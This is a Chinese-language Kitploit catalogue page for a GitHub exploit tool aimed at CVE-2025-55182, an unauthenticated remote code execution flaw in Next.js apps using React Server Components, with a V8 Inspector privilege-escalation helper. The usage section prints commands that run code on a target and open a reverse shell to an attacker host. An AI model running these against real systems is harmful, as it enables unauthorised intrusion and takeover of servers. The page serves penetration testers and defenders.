Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 针对 CVE-2025-55182 的独立漏洞利用程序,通过 React Server Components Flight 反序列化在 Next.js App Router 中实现未认证的远程代码执行(RCE),并附带反弹 Shell 及 Node.js V8 Inspector 权限提升辅助工具。 | Kitploit
工具/GitHubGitHub/r3vpwnx/cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubr3vpwnx/cve-2025-55182

CVE-2025-55182

针对 CVE-2025-55182 的独立漏洞利用程序,通过 React Server Components Flight 反序列化在 Next.js App Router 中实现未认证的远程代码执行(RCE),并附带反弹 Shell 及 Node.js V8 Inspector 权限提升辅助工具。

查看仓库
1821天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 - React2Shell (CVE-2025-55182) 未认证 RCE,通过 React Server Components Flight 反序列化实现

针对启用 React Server Components 的 Next.js App Router 应用中 CVE-2025-55182 的独立利用程序。向 server-action 端点构造 RSC Flight 载荷可实现未认证的远程代码执行。附带一个 Node.js V8 Inspector(调试端口)本地权限提升辅助工具,可通过 process.mainModule.require 沙箱绕过在特权进程中执行代码。

CVE: CVE-2025-55182

要求

python3 -m pip install requests    # 用于 Python PoC

用法

cdp_privesc.py

python3 cdp_privesc.py <target>

react2shell-poc.py(RSC RCE — 内置版本,参见致谢)

python3 react2shell-poc.py -t http://TARGET:3000 -c "id"          # 基于错误的命令外带
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444

参考

  • https://github.com/p3ta00/react2shell-poc
  • https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

致谢

react2shell-poc.py 是 p3ta00 公开的 CVE-2025-55182 PoC,原样内置自 https://github.com/p3ta00/react2shell-poc,以实现自包含的利用链。 cdp_privesc.py(Node.js V8 Inspector 本地权限提升)为原创代码。

免责声明

仅用于授权的安全测试和教育目的。请仅对您拥有或已获得明确书面许可的系统运行此工具。


作者:r3vpwnx

下载工具